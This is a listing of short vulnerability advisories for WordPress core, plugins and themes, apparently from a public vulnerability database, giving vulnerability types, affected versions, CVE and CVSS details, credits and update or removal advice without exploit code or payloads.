WordPress AI Contact Us Form Plugin <= 1.0 is vulnerable to Cross Site Scripting (XSS)

Software AI Contact Us Form Type Plugin Vulnerable versions = 1.0 Fixed in N/A OWASP Top 10 A7: Cross-Site Scripting XSS Classification Cross Site Scripting XSS CVE CVE-2023-24386 Patch priority Low CVSS severity Low 5.9 Developer Claim ownership PSID 673ba1e565e3 Credits Aswin Balaji Required...

WordPress FV Flowplayer Video Player plugin <= 7.5.18.727 - Authenticated Persistent Cross-Site Scripting (XSS) vulnerability

Authenticated Persistent Cross-Site Scripting XSS vulnerability discovered by Ex.Mi Patchstack in WordPress FV Flowplayer Video Player plugin versions = 7.5.18.727. Solution Update the WordPress FV Flowplayer Video Player plugin to the latest available version at least 7.5.19.727...

WordPress SEO URL Redirects LlamasApps plugin <= 2.0 - Sensitive Information Disclosure vulnerability

Sensitive Information Disclosure vulnerability discovered in WordPress SEO URL Redirects LlamasApps plugin versions = 2.0. Solution No patched version available...

WordPress Saan World Clock Plugin <= 1.8 is vulnerable to Cross Site Scripting (XSS)

Software Saan World Clock Type Plugin Vulnerable versions = 1.8 Fixed in N/A OWASP Top 10 A7: Cross-Site Scripting XSS Classification Cross Site Scripting XSS CVE CVE-2023-0145 Patch priority Medium CVSS severity Medium 6.5 Developer Claim ownership PSID cb720ac68691 Credits Lana Codes Required...

WordPress WP ALL Export Pro plugin <= 1.7.8 - Authenticated Code Injection vulnerability

Authenticated Code Injection vulnerability discovered by Sanjay Das in WordPress WP ALL Export Pro plugin versions = 1.7.8. Solution Update the WordPress WP ALL Export Pro plugin to the latest available version at least 1.7.9...

WordPress Conversios.io plugin <= 4.6.1 - SQL Injection (SQLi) vulnerability

SQL Injection SQLi vulnerability discovered by JrXnm in WordPress Conversios.io plugin versions = 4.6.1. Solution Update the WordPress Conversios.io plugin to the latest available version at least 4.6.2...

WordPress WS Form LITE plugin <= 1.8.175 - Stored Cross-Site Scripting (XSS) vulnerability

Stored Cross-Site Scripting XSS vulnerability discovered by Felipe Restrepo Rodriguez in WordPress WS Form LITE plugin versions = 1.8.175. Solution Update the WordPress WS Form LITE plugin to the latest available version at least 1.8.176...

WordPress Smart Slider 3 plugin <= 3.5.1.9 - PHP Object Injection vulnerability

PHP Object Injection vulnerability discovered by Nguyen Duy Quoc Khanh in WordPress Smart Slider 3 plugin versions = 3.5.1.9. Solution Update the WordPress Smart Slider 3 plugin to the latest available version at least 3.5.1.11...

WordPress NextCellent Gallery plugin <= 1.9.35 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability

Authenticated Stored Cross-Site Scripting XSS vulnerability discovered by lucy in WordPress NextCellent Gallery plugin versions = 1.9.35. Solution Deactivate and delete. This plugin has been closed as of June 1, 2022 and is not available for download. This closure is temporary, pending a full...

WordPress Admin Menu Editor plugin <= 1.0.4 - Reflected Cross-Site Scripting (XSS) vulnerability

Reflected Cross-Site Scripting XSS vulnerability discovered by Ran Crane in WordPress Admin Menu Editor plugin versions = 1.0.4. Solution Deactivate and delete. This plugin has been closed as of March 9, 2022 and is not available for download. This closure is temporary, pending a full review...

WordPress Photo Gallery by 10Web plugin <= 1.6.2 - Unauthenticated SQL Injection (SQLi) vulnerability

Unauthenticated SQL Injection SQLi vulnerability discovered by JrXnm in WordPress Photo Gallery by 10Web plugin versions = 1.6.2. Solution Update the WordPress Photo Gallery by 10Web plugin to the latest available version at least 1.6.3...

WordPress WP Statistics plugin <= 13.1.5 - Unauthenticated Blind SQL Injection (SQLi) vulnerability

Unauthenticated Blind SQL Injection SQLi vulnerability via IP discovered by Muhammad Zeeshan Xib3rR4dAr in WordPress WP Statistics plugin versions = 13.1.5. Solution Update the WordPress WP Statistics plugin to the latest available version at least 13.1.6...

WordPress <= 5.8.2 - Authenticated Object Injection in Multisites

Authenticated Object Injection in Multisites discovered by Simon Scannell SonarSource in WordPress versions = 5.8.2. Solution Update WordPress to the latest available version at least 5.8.3...

WordPress Wordfence Plugin <= 3.8.6 - Stored XSS

This plugin is prone to lib/IPTraf.php User-Agent header stored cross site scripting vulnerability. Solution Update plugin...

WordPress National Weather Service Alerts plugin <= 1.3.5 - Local File Inclusion Vulnerability

Local File Inclusion Vulnerability discovered by Nguyen Xuan Chien in WordPress Plugin National Weather Service Alerts versions = 1.3.5...

WordPress Modern Events Calendar Lite plugin <= 6.1.0 - Unauthenticated Blind SQL Injection (SQLi) vulnerability

Unauthenticated Blind SQL Injection SQLi vulnerability discovered by Krzysztof Zając in WordPress Modern Events Calendar Lite plugin versions = 6.1.0. Solution Update the WordPress Modern Events Calendar Lite plugin to the latest available version at least 6.1.5...

WordPress Glass plugin <= 1.3.2 - Cross-Site Request Forgery (CSRF) vulnerability leading to Stored Cross-Site Scripting (XSS)

Cross-Site Request Forgery CSRF vulnerability leading to Stored Cross-Site Scripting XSS discovered by ABISHEIK M in WordPress Glass plugin versions = 1.3.2. Solution This plugin has been closed as of May 26, 2021 and is not available for download. This closure is temporary, pending a full review...

WordPress Any Font Plugin <= 2.2.3 - XSS

Because of this vulnerability in mceanyfont/dialog.php, the attackers can inject arbitrary web script or HTML via the "text" parameter. Solution Update the plugin...

WordPress Web Minimalist Theme 1.1 - Cross Site Scripting

WordPress Web Minimalist theme's "index.php" parameter is prone to a cross-site scripting vulnerability. It fails to properly clean up user-supplied input. An attacker may execute arbitrary script code in the browser of an user in the context of the affected site. In this way the attacker can ste...

WordPress WordPress Automatic plugin <= 3.115.0 - Authenticated (Author+) Arbitrary File Upload vulnerability

Authenticated Author+ Arbitrary File Upload vulnerability discovered by Trương Hữu Phúc truonghuuphuc in WordPress Plugin Automatic versions = 3.115.0...

WordPress Bulk Edit Categories and Tags – Create Thousands Quickly on the Editor Plugin < 1.7.6 is vulnerable to Cross Site Scripting (XSS)

Software Bulk Edit Categories and Tags – Create Thousands Quickly on the Editor Type Plugin Vulnerable versions 1.7.6 Fixed in 1.7.6 OWASP Top 10 A3: Injection Classification Cross Site Scripting XSS CVE CVE-2023-33999 Patch priority Medium CVSS severity Medium 7.1 Developer Claim ownership PSID...

WordPress Oceanwp sticky header plugin <= 1.0.8 - Cross-Site Request Forgery (CSRF) vulnerability

Cross-Site Request Forgery CSRF vulnerability leading to a header style change discovered by Rasi Afeef Patchstack Alliance in WordPress Oceanwp sticky header plugin versions = 1.0.8. Solution No patched version is available. No reply from the vendor...

WordPress Real Cookie Banner plugin <= 2.14.1 - Settings Reset via Cross-Site Request Forgery (CSRF) vulnerability

Settings Reset via Cross-Site Request Forgery CSRF vulnerability discovered by Krzysztof Zając in WordPress Real Cookie Banner plugin versions = 2.14.1. Solution Update the WordPress Real Cookie Banner plugin to the latest available version at least 2.14.2...

WordPress WPQA premium plugin < 5.4 - Reflected Cross-Site Scripting (XSS) vulnerability

Reflected Cross-Site Scripting XSS vulnerability discovered by Veshraj Ghimire in WordPress WPQA premium plugin versions 5.4. Solution Update the WordPress WPQA premium plugin to the latest available version at least 5.4...

WordPress Brandfolder Plugin 3.0 - Remote and Local File Inclusion

Brandfolder plugin is prone to remote and local files inclusion vulnerability. It allows an attacker to host on a server "wp-load.php" file and disable it by using "htaccess". Solution Upgrade the plugin...

WordPress Sahifa Theme <= 2.4.0 - Multiple Vulnerabilities

This theme is prone to a cross site request forgery and full path disclosure vulnerabilities. Because of CSRF you can lost your site settings. Because of full path disclosure, the attackers can obtain sensitive information via an invalid upload request. Solution Update the theme...

WordPress TimThumb Plugin 1.32 - Remote Code Execution

This TimThumb plugin is prone to a Remote Code Execution vulnerability because script does not check remotely cached files properly. Solution Update this plugin to the latest version or just delete the "timthumb" file...

WordPress Ajax Load More plugin <= 5.5.3 - PHAR Deserialization via Cross-Site Request Forgery (CSRF) vulnerability

PHAR Deserialization via Cross-Site Request Forgery CSRF vulnerability discovered by Rasoul Jahanshahi in WordPress Ajax Load More plugin versions = 5.5.3. Solution Update the WordPress Ajax Load More plugin to the latest available version at least 5.5.4...

WordPress Ad Invalid Click Protector (AICP) plugin <= 1.2.5.2 - Cross-Site Request Forgery (CSRF) vulnerability

Banned users deletion via Cross-Site Request Forgery CSRF vulnerability in WordPress Ad Invalid Click Protector AICP plugin versions = 1.2.5.2. Solution Update the WordPress Ad Invalid Click Protector AICP plugin to the latest available version at least 1.2.6...

WordPress Enlighten theme <= 1.3.5 - Arbitrary File Upload vulnerability

Arbitrary File Upload vulnerability discovered by Lenon Leite Patchstack Red Team project in WordPress Enlighten theme versions = 1.3.5. This theme uses a vulnerable piece of code related to previously identified vulnerability - CVE-2021-39317. Solution Deactivate and delete. The vendor ignores t...

WordPress Smart Google Code Inserter plugin <=3.4 - SQL injection (SQLi) vulnerability

SQL injection SQLi vulnerability found by Benjamin Lim in WordPress Smart Google Code Inserter plugin versions =3.4. Plugin function saveGoogleAdWords function in smartgooglecode.php file passes unsanitized $POST"oId" input into the SQL query. Solution Update the WordPress Smart Google Code...

WordPress Pinterest Plugin <= 1.3.1 - Multiple Vulnerabilities

This plugin is prone to multiple unspecified vulnerabilities. Solution Update the plugin...

WordPress Booster for WooCommerce plugin <= 5.6.6 - Cross-Site Request Forgery (CSRF) vulnerability

Cross-Site Request Forgery CSRF vulnerability leading to Checkout Files Deletion discovered by WPScan in WordPress Booster for WooCommerce plugin versions = 5.6.6. Solution Update the WordPress Booster for WooCommerce plugin to the latest available version at least 5.6.7...

WordPress Popup Maker plugin <= 1.16.10 - Auth. Stored Cross-Site Scripting (XSS) vulnerability

Auth. Stored Cross-Site Scripting XSS vulnerability discovered by c3p0d4y in WordPress Popup Maker plugin versions = 1.16.10. Solution Update the WordPress Popup Maker plugin to the latest available version at least 1.16.11...

WordPress Yoast SEO <= 17.2.1 - Unauthenticated Full Path Disclosure vulnerability

Unauthenticated Full Path Disclosure vulnerability discovered by Fariq Fadillah Gusti Insani in WordPress Yoast SEO versions = 17.2.1. Solution Update the WordPress Yoast SEO to the latest available version at least 17.3...

WordPress File Manager plugin <= 6.8 - Unauthenticated Arbitrary File Upload leading to RCE vulnerability

Unauthenticated Arbitrary File Upload leading to RCE vulnerability found by w4fz5uck5 in WordPress File Manager plugin versions = 6.8. Solution Update the WordPress File Manager plugin to the latest available version at least 6.9...

WordPress Uncode Theme 1.3.1 - Arbitrary File Upload

WordPress Uncode theme is prone to an arbitrary file upload vulnerability. It allows an attacker to upload arbitrary files to the affected computer. Solution Update the theme...

WordPress Simple Backup Plugin <= 2.7.10 - Arbitrary File Download

This plugin is prone to an arbitrary file download vulnerability. Solution Update the plugin...

WordPress Custom Product Tabs for WooCommerce plugin <= 1.7.7 - Broken Access Control vulnerability leading to &yikes-the-content-toggle option update

Broken Access Control vulnerability leading to &yikes-the-content-toggle option update discovered by Tien Nguyen Anh Patchstack Alliance in WordPress Custom Product Tabs for WooCommerce plugin versions = 1.7.7. Solution Update the WordPress Custom Product Tabs for WooCommerce plugin to the latest...

WordPress Popular Posts plugin <= 5.3.2 - Authenticated Code Injection vulnerability leading to Remote Code Execution (RCE)

Authenticated Code Injection vulnerability leading to Remote Code Execution RCE discovered by NinTechNet in WordPress Popular Posts plugin versions = 5.3.2. Solution Update the WordPress Popular Posts plugin to the latest available version at least 5.3.3...

WordPress Really Simple Security Pro multisite Plugin 9.0.0-9.1.1.1 is vulnerable to Broken Authentication

Software Really Simple Security Pro multisite Type Plugin Vulnerable versions 9.0.0-9.1.1.1 Fixed in 9.1.2 OWASP Top 10 A1: Broken Access Control Classification Broken Authentication CVE CVE-2024-10924 Patch priority High CVSS severity High 9.8 Developer Claim ownership PSID 976349dfad8d Credits...

WordPress VR Calendar plugin < 2.3.1 - Unauthenticated Arbitrary Function Call vulnerability

Unauthenticated Arbitrary Function Call vulnerability discovered by Vinay Varma Mudunuri and Krishna Harsha Kondaveeti in WordPress VR Calendar plugin versions 2.3.1. Solution Update the WordPress VR Calendar plugin to the latest available version at least 2.3.1...

WordPress Database Backup for WordPress plugin <= 2.5.1 - Arbitrary Schedule Settings Update via Cross-Site Request Forgery (CSRF) vulnerability

Arbitrary Schedule Settings Update via Cross-Site Request Forgery CSRF vulnerability discovered by Daniel Ruf in WordPress Database Backup for WordPress plugin versions = 2.5.1. Solution Update the WordPress Database Backup for WordPress plugin to the latest available version at least 2.5.2...

WordPress Slideshow, Image Slider by 2J plugin <= 1.3.54 - Authenticated Reflected Cross-Site Scripting (XSS) vulnerability

Authenticated Reflected Cross-Site Scripting XSS vulnerability discovered by Tien Nguyen Ahn aka vigov5 Patchstack Alliance in WordPress Slideshow, Image Slider by 2J plugin versions = 1.3.54. Solution No patched version is available. No reply from the vendor...

WordPress Country Selector premium plugin <= 1.6.5 - Reflected Cross-Site Scripting (XSS) vulnerability

Reflected Cross-Site Scripting XSS vulnerability discovered in WordPress Country Selector premium plugin versions = 1.6.5. Solution Update the WordPress Country Selector premium plugin to the latest available version at least 1.6.6...

WordPress WPBakery Page Builder premium plugin <= 6.4 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability

Authenticated Stored Cross-Site Scripting XSS vulnerability found by Chloe Chamberland in WordPress WPBakery Page Builder premium plugin versions = 6.4. Solution Update the WordPress WPBakery Page Builder premium plugin to the latest available version at least 6.4.1...

WordPress All-in-One WP Migration plugin <= 7.14 - Arbitrary Backup Download vulnerability

Arbitrary Backup Download vulnerability found by Kamil Vavra in WordPress All-in-One WP Migration plugin versions = 7.14. Solution Update the WordPress All-in-One WP Migration plugin to the latest available version at least 7.15...

WordPress is vulnerable to Path Traversal

Software WordPress Type WordPress Core Vulnerable versions 6.5.5 Fixed in 6.5.5 OWASP Top 10 A1: Broken Access Control Classification Path Traversal CVE CVE-2024-32111 Patch priority Low CVSS severity Low 5 Developer Claim ownership PSID f2c038f99720 Credits Rafie Muhammad Patchstack Required...

WordPress Popup Builder plugin <= 4.1.0 - Cross-Site Request Forgery (CSRF) vulnerability leading to Popup Status Change

Cross-Site Request Forgery CSRF vulnerability leading to Popup Status Change discovered by BEE-K Patchstack in WordPress Popup Builder plugin versions = 4.1.0. Solution Update the WordPress Popup Builder plugin to the latest available version at least 4.1.1...

WordPress GTM4WP plugin <= 1.15.1 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability

Authenticated Stored Cross-Site Scripting XSS vulnerability discovered by Muhammad Zeeshan Xib3rR4dAr in WordPress GTM4WP plugin versions = 1.15.1. Solution Update the WordPress GTM4WP plugin to the latest available version at least 1.15.2...